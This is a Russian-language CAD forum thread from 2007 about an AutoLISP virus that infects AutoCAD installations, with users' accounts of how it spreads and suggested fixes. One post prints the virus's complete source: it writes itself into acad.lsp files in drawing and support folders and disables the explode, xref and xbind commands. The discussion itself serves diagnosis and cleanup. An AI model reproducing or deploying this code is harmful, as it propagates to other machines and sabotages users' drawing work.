Проникающая гидроизоляция бетона
| Правила | Регистрация | Пользователи | Поиск | Сообщения за день | Все разделы прочитаны |  Справка по форуму | Файлообменник |

Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Вирус для Автокада

Вирус для Автокада

Ответ
Поиск в этой теме
Непрочитано 24.05.2007, 22:57 #1
Вирус для Автокада
dextron3
 
Фотограф
 
Алматы
Регистрация: 01.01.2007
Сообщений: 5,056

Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]

Тем, кому не прочитать тему:
http://forum.dwg.ru/showpost.php?p=218027&postcount=36
http://forum.dwg.ru/showpost.php?p=262114&postcount=52
http://forum.dwg.ru/showpost.php?p=796334&postcount=88
Для понимания механизма работы "вируса": http://forum.dwg.ru/showpost.php?p=1...&postcount=130
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR
__________________
инженер проектировшик с опттом программа авто гад образование высшие

Последний раз редактировалось Кулик Алексей aka kpblc, 26.02.2015 в 15:02.
Просмотров: 181997
 
Автор темы   Непрочитано 24.05.2007, 23:00
#2
dextron3

Фотограф
 
Регистрация: 01.01.2007
Алматы
Сообщений: 5,056


Если у кого есть возможность протестить данный вирус, или кто уже сталкивался с этим, просьба посочувст... ой поделиться решением проблемы :roll:
__________________
инженер проектировшик с опттом программа авто гад образование высшие
dextron3 вне форума  
 
Непрочитано 24.05.2007, 23:05
#3
ppv

инженер
 
Регистрация: 05.08.2006
Самара
Сообщений: 258


А что ты предлагаешь?
Всем, кто не боится, открыть твой архив? При условии, что уже известно что его ловит только последний антивирус.
Спасибо за новость, но проверять ее не буду :roll:
ppv вне форума  
 
Непрочитано 24.05.2007, 23:09
#4
Alaspher


 
Регистрация: 11.10.2004
e•burg
Сообщений: 773


Симантек его видит и лечит - ничего страшного (скрипт).
ALS.Bursted.A
Alaspher вне форума  
 
Автор темы   Непрочитано 24.05.2007, 23:11
#5
dextron3

Фотограф
 
Регистрация: 01.01.2007
Алматы
Сообщений: 5,056


В архиве маленкий ЛИСП файлик просто
поюзать его, если знаешь лисп язык
посмотреть, он сам по себе безобидный
но только с ДВЖ файлами совместно не запускай
__________________
инженер проектировшик с опттом программа авто гад образование высшие
dextron3 вне форума  
 
Автор темы   Непрочитано 24.05.2007, 23:12
#6
dextron3

Фотограф
 
Регистрация: 01.01.2007
Алматы
Сообщений: 5,056


NOD 32 ВИДИТ!

А ПОЧЕМУ КАСПЕРСКИЙ НЕ ЗАМЕЧАЕТ ВОД БЕДА
__________________
инженер проектировшик с опттом программа авто гад образование высшие
dextron3 вне форума  
 
Непрочитано 24.05.2007, 23:47
#7
DEM

YngIngKllr
 
Регистрация: 29.03.2005
СПб
Сообщений: 12,987


Ну если все скрипты запускать то вще кердык мона получить.
__________________
Работаю за еду.
Working for food.
Für Essen arbeiten.
العمل من أجل الغذاء
Працую за їжу.
DEM вне форума  
 
Непрочитано 25.05.2007, 00:20
#8
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 37,455


Вот вам несколько вариантов лекарств:
1. Установить системную переменную ACADLSPASDOC в 0
2. В меню исправить вызовы с _xref, _explode, _xbind на _.xref, _.explode, _.xbind соответвенно
3. На кнопку повесить код типа:
Код:
[Выделить все]
^C^C^P(mapcar '(lambda(x) (command "_.redefine" x)) '("xref" "explode" "xbind"));
Скажу честно, работоспособность ни одного из способов не проверял.
__________________

---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 25.05.2007, 00:24
#9
DEM

YngIngKllr
 
Регистрация: 29.03.2005
СПб
Сообщений: 12,987


kpblc
А ты чего себе интернет установил дома.
ГЫЫ
А ты по пробуй свой код то.
__________________
Работаю за еду.
Working for food.
Für Essen arbeiten.
العمل من أجل الغذاء
Працую за їжу.
DEM вне форума  
 
Непрочитано 25.05.2007, 00:25
#10
Pilot

Проектировщик свиноводство
 
Регистрация: 21.08.2003
Сообщений: 2,213


Цитата:
Здравствуйте!

Я - компьютерный вирус.
Человек, меня написавший, как программист ничего из себя не представляет, и я не могу нанести вреда Вашему компьютеру.

Поэтому, прошу Вас, сами удалите со своего жесткого диска какой-нибудь важный файл, а потом разошлите меня по электронной почте своим друзьям и коллегам.
Pilot вне форума  
 
Непрочитано 25.05.2007, 00:28
#11
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 37,455


> DEM : Ага, протянул. Правда, скорость хреноватая (немногим быстрее диалапа), но все лучше чем ничего.
Насчет опробовать - вот веришь, не до того!
__________________

---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 25.05.2007, 05:55
#12
Profan


 
Регистрация: 25.12.2005
Москва
Сообщений: 13,663


Следует иметь в виду, что этот файл неминуемо запустится, если будет находится в одной папке с открываемым рисунком DWG. Большинство пользователей понятия не имеют о файле acad.lsp и его особых свойствах и получив от сторонней организации набор файлов, содержащий рисунки, шрифты, типы линий, не обращают внимания на еще какой-то непонятный файл. Они не трогают его, а сразу запускают AutoCAD двойным щелчком по имени полученного рисунка. И процесс пошел.
Profan вне форума  
 
Автор темы   Непрочитано 25.05.2007, 08:24
#13
dextron3

Фотограф
 
Регистрация: 01.01.2007
Алматы
Сообщений: 5,056


Цитата:
Сообщение от Profan
Следует иметь в виду, что этот файл неминуемо запустится, если будет находится в одной папке с открываемым рисунком DWG. Большинство пользователей понятия не имеют о файле acad.lsp и его особых свойствах и получив от сторонней организации набор файлов, содержащий рисунки, шрифты, типы линий, не обращают внимания на еще какой-то непонятный файл. Они не трогают его, а сразу запускают AutoCAD двойным щелчком по имени полученного рисунка. И процесс пошел.
Так еще при запуске он генерирует такой же ЛИСП файл в папке SUPPORT автокада и уже сидит там, как основной вирус, некоторые думают что просто удалил файл acad.lisp с принесенным файлом и все, но нужно проверить ДИСК С, потомучто иногда компьютер еще ранее заражен
__________________
инженер проектировшик с опттом программа авто гад образование высшие
dextron3 вне форума  
 
Непрочитано 25.05.2007, 10:01
#14
ShaggyDoc

Thượng Tá Quân Đội Nhân Dân Việt Nam
 
Регистрация: 14.03.2005
44d32'44"С, 33d26'51"В
Сообщений: 11,634


Цитата:
...во все проектных фирмах все автокадовские файлы заражены вирусом ...
Детские "страшилки" про "зеленую скамеечку" ...
ShaggyDoc вне форума  
 
Непрочитано 25.05.2007, 10:09
#15
Кочетков Андрей

Regular Java Developer
 
Регистрация: 03.02.2006
Сообщений: 4,811


Это не вирус.
Просто кто-то таким образом пытался защитить свои файлы от редактирования и дальнейшего использования )))
Кочетков Андрей вне форума  
 
Непрочитано 25.05.2007, 10:12
#16
T-Yoke

Артиллерист - вертолётчик. Дипломированный инженер-механик. Technologist
 
Регистрация: 29.11.2004
Где-то около Москвы
Сообщений: 15,364
Отправить сообщение для T-Yoke с помощью Skype™


Ну вот текст этого файла, и кто скажет, что здесь вредоносного?
------------------------------------------------------------------------------
(defun s::startup(/ old_cmd path dwgpath mnlpath apppath oldacad newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq path (findfile "base.dcl"))
(setq path (substr path 1 (- (strlen path)8)))
(setq mnlpath (getvar "menuname"))
(setq nowdwg (getvar "dwgname"))
(setq wjqm (findfile nowdwg))
(setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
(setq acadpath (findfile "acad.lsp"))
(setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
(setq ns1 "" ns2 "")
(setq lspbj 0)
(setq wjqm (strcat path "acad.lsp"))
(if (setq wjm (open wjqm "r"))
(progn
(while (setq wz (read-line wjm))
(setq ns1 ns2)
(setq ns2 wz)
)
(if (> (strlen ns1) 14)
(if (= (substr ns1 8 7) "acadapp")
(setq lspbj 1)
)
)
(close wjm)
)
)
(if (and (= acadpath dwgpath)
(/= acadpath path))
(progn
(setq oldacad (findfile "acad.lsp"))
(setq newacad (strcat path "acadapp.lsp"))
(if (= lspbj 0)
(progn
(setq wjqm (strcat path "acad.lsp"))
(setq wjm (open wjqm "a"))
(write-line (strcat "(load" (chr 34) "acadapp" (chr 34)")") wjm)
(write-line "(princ)" wjm)
(close wjm)
)
)
(writeapp)
)
(progn
(if (/= nowdwg "Drawing.dwg")
(progn
(setq oldacad (findfile "acadapp.lsp"))
(setq newacad (strcat dwgpath "acad.lsp"))
(writeapp)
)
)
)
)
(command "undefine" "explode")
(command "undefine" "xref")
(command "undefine" "xbind")
(setvar "cmdecho" old_cmd)
(princ)
)
(defun writeapp()
(if (setq wjm1 (open newacad "w"))
(progn
(setq wjm (open oldacad "r"))
(while (setq wz (read-line wjm))
(write-line wz wjm1)
)
(close wjm)
(close wjm1)
)
)
)
(defun C:explode (/ p cont old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq p(ssget))
(if p
(progn
(setq cont (sslength p))
(princ "\nSeltct objects:")
(princ cont)
(princ "found")
(princ "\n")
(princ cont)
(princ "was not able to be explode")
)
)
(setvar "cmdecho" old_cmd)
(princ)
)
(defun C:xref(/ old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(command "insert")
(setvar "cmdecho" old_cmd)
(princ)
)

-------------------------------------------------------------------------
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I
T-Yoke вне форума  
 
Автор темы   Непрочитано 25.05.2007, 10:26
#17
dextron3

Фотограф
 
Регистрация: 01.01.2007
Алматы
Сообщений: 5,056


а из за чего тогда антивирь ругаеца
__________________
инженер проектировшик с опттом программа авто гад образование высшие
dextron3 вне форума  
 
Непрочитано 25.05.2007, 10:26
#18
Кочетков Андрей

Regular Java Developer
 
Регистрация: 03.02.2006
Сообщений: 4,811


Переопределяются некоторые команды.
Кочетков Андрей вне форума  
 
Непрочитано 25.05.2007, 11:27
#19
Alaspher


 
Регистрация: 11.10.2004
e•burg
Сообщений: 773


Цитата:
Сообщение от dextron3
а из за чего тогда антивирь ругаеца
Изза того, что кто-то, совершенно справедливо, пожаловался антивирусникам на зловредный код, а они включили его в свои базы.
Alaspher вне форума  
 
Непрочитано 25.05.2007, 11:45
#20
shnn

Инженер
 
Регистрация: 18.02.2005
Самара
Сообщений: 756


2 T-Yoke
вот что:
Код:
[Выделить все]
(command "undefine" "explode") 
(command "undefine" "xref") 
(command "undefine" "xbind")
А вообще считаю что это злая шутка над коллегами случайно вырвалась на свободу за пределы офиса.
shnn вне форума  
Ответ
Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Вирус для Автокада

Размещение рекламы
Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Резервуар 250м.куб. на проверку dextron3 Инженерные сети 42 07.05.2011 15:59
Компьютер для автокада ugoday Компьютерная и бытовая техника, электроника и инструмент 31 02.09.2007 15:07
Хочу купить монитор ЖК для автокада какой фирмы я не знаю вы Рома_2 Разное 10 21.06.2007 03:44
Версия ЛАЙТ для автокада 2006 Kaktuz AutoCAD 8 18.10.2006 18:39
Определение нагрузок для нестандартных конструкций. NIVa Конструкции зданий и сооружений 2 06.08.2005 21:42